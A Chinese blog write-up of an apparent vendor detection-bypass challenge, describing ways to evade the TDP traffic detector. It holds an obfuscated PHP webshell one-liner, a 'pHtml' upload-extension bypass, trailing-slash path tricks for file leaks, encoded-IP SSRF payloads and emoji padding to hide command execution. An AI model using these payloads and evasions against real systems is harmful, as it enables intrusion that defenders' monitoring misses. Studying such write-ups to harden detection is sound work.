总结 | 微步TDP挑战赛的一些思路

渗透技巧 3年前 (2022) admin
798 0 0

0x01 前言

为期14天的TDP线上挑战赛已经结束全部赛程,这两个星期的排行榜也变化很大。本来没有多少时间的我就只在第一个星期花了点时间,大概总共花了三个小时吧。这期间感谢@PeiQi 一直和师傅交流,也不断地提供思路给我。恭喜PeiQi师傅这次荣获第一。我在最后的一两个小时被反超,从最高的第四名到最后的第十一名,这次也是个经验与成长,所以简单的记录一下。

总结 | 微步TDP挑战赛的一些思路

0x02 WriteUp

1. 逻辑漏洞

对于逻辑漏洞,TDP作为流量检测是没办法识别的。

比如:任意用户登录、用户重复注册等

不过分数相对会低很多,毕竟是Nday的利用与复现。如果是0Day,质量比较好的会有一百分以上,有加分。总结 | 微步TDP挑战赛的一些思路

2. 文件上传

测试了TDP之后发现,它的一个感知会先检测文件名之后再检测文件内容

总结 | 微步TDP挑战赛的一些思路

比如我们使用.php结尾会立刻被检测,我们可以使用:pHtml来绕过

对于内容,可以通过该代码绕过检测。在这里感谢PeiQi师傅提供思路

<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);

3. 任意文件读取/任意文件下载

我们打任意文件读取的时候,对于Linux经常会习惯性的etc/passwd这个对于TDP是能够检测的,比较敏感的目录他都会拦截

但是对于文件比较小的conf文件它是不会检测的总结 | 微步TDP挑战赛的一些思路

4. 信息泄露

信息泄露的话,TDP对于某些目录会拦截,比如:/windows/php.ini

如果说是某个文件泄露的数据,比如管理员密码等。可以通过加一个斜杆来绕过。在推特上很多师傅发的技巧中,有很多也是通过斜杆来绕过的。

总结 | 微步TDP挑战赛的一些思路

例子:

/xxx/xxx/password.conf #拦截
/xxx/xxx/password.conf/ #不拦截
总结 | 微步TDP挑战赛的一些思路
总结 | 微步TDP挑战赛的一些思路

5. SSRF

正常大家的绕过思路

http://127.0.0.1  >>>  http://0177.0.0.1/
http://127.0.0.1  >>>  http://2130706433/
http://192.168.0.1  >>>  http://3232235521/
http://192.168.1.1  >>>  http://3232235777/
http://[email protected]
http://www。qq。com
http://wwwqqcom
http://www.qq.com
http://dwz.cn/xxxx #短链接
http://127.0.0.1.xip.io/

等等 ... ...

在这里我们可以使用Emoji?或者Unicode字符集,还有通过各种表情来造成脏数据。

总结 | 微步TDP挑战赛的一些思路
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
(⊙﹏⊙)

6. 命令执行

下午看到PeiQi师傅已经发过了,这里也是参考的PeiQi师傅的思路

last命令是不拦截的

总结 | 微步TDP挑战赛的一些思路
总结 | 微步TDP挑战赛的一些思路
https://mp.weixin.qq.com/s/OcNVMNGOuVP7BUidACJSoA

我们可以通过大量的emoji进行脏数据来绕过TDP检测

????✔ ... ...


从现在开始,星球定价150元!日后只有慢慢涨没有跌价!现在入股不亏,持续输出原创文章,还是小有干货的!总结 | 微步TDP挑战赛的一些思路

原文始发于微信公众号(不懂安全的校长):总结 | 微步TDP挑战赛的一些思路

版权声明:admin 发表于 2022年3月8日 上午12:00。
转载请注明:总结 | 微步TDP挑战赛的一些思路 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...